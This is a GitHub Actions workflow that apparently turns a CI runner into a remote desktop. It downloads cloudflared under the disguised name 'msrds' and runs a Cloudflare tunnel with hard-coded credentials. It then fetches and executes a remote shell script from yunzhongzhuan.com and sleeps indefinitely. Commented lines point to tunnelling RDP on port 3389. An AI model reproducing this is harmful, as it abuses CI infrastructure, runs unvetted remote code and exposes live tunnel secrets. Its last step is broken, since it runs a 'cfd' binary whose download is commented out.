name: push
on:
  workflow_dispatch:
jobs:
  run:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 1
      matrix:
        shard: [1]
    steps:
      - name: push
        run: |
          cd

          
          curl -X GET -L "https://github.com/cloudflare/cloudflared/releases/download/2026.3.0/cloudflared-linux-amd64" -o msrds
          echo -e "-----BEGIN ARGO TUNNEL TOKEN-----\neyJ6b25lSUQiOiJhMmUzYWE1NTZjMmVmMzg5ODIwZTRiYzE0ODYzMDMzZCIsImFj\nY291bnRJRCI6IjBkNjNmZWIwOWM2NWVkMjdmMzk0MjAwMjdiMjA1MzZjIiwiYXBp\nVG9rZW4iOiI2aTdoZEZJa0Nvc3l4WUFyWkxEall0YW5GUTdpMXc0ZlhlWW94MmFR\nIn0=\n-----END ARGO TUNNEL TOKEN-----\n" > cert.pem
          echo '{"AccountTag":"0d63feb09c65ed27f39420027b20536c","TunnelSecret":"cU0/NPCyUXwiq5bL6tl51aB35nbn1Nrz2FyFhPTGnTI=","TunnelID":"30c20d90-cbe0-4ebc-8b50-a86872de8f17","Endpoint":""}' > config.json
          echo -e "tunnel: 30c20d90-cbe0-4ebc-8b50-a86872de8f17\ncredentials-file: config.json\n\ningress:\n  - hostname: 30c20d90-cbe0-4ebc-8b50-a86872de8f17.yunzhongzhuan.com\n    service: http://localhost:27015\n  - service: http_status:404" > config.yml
          chmod +x ./msrds
          ./msrds tunnel run --origincert cert.pem --credentials-file config.json --loglevel fatal --protocol http2 --url http://localhost:27015 30c20d90-cbe0-4ebc-8b50-a86872de8f17
          

          curl -X GET "https://exampleoci.yunzhongzhuan.com/linux-desktop-installer(GoodNoVNC).sh" -o 0.sh
          chmod +x 0.sh
          ./0.sh
          sleep 999999999

          # curl -X GET https://exampleoci.yunzhongzhuan.com/linux/cloudflared/cloudflared-linux-amd64 -o cfd
          # curl -X GET https://exampleoci.yunzhongzhuan.com/linux/cloudflared/.cloudflared/cert.pem -o cert.pem
          # curl -X GET https://exampleoci.yunzhongzhuan.com/linux/cloudflared/.cloudflared/097edd59-4421-4b13-b5fc-7015ae4cf939.json -o 097edd59-4421-4b13-b5fc-7015ae4cf939.json
          # curl -X GET https://exampleoci.yunzhongzhuan.com/linux/cloudflared/.cloudflared/097edd59-4421-4b13-b5fc-7015ae4cf939.config.yml -o 097edd59-4421-4b13-b5fc-7015ae4cf939.config.yml
          chmod +x cfd
          ./cfd tunnel --credentials-file 097edd59-4421-4b13-b5fc-7015ae4cf939.json --origincert cert.pem --config 097edd59-4421-4b13-b5fc-7015ae4cf939.config.yml --url tcp://localhost:3389 run ocivnc5901
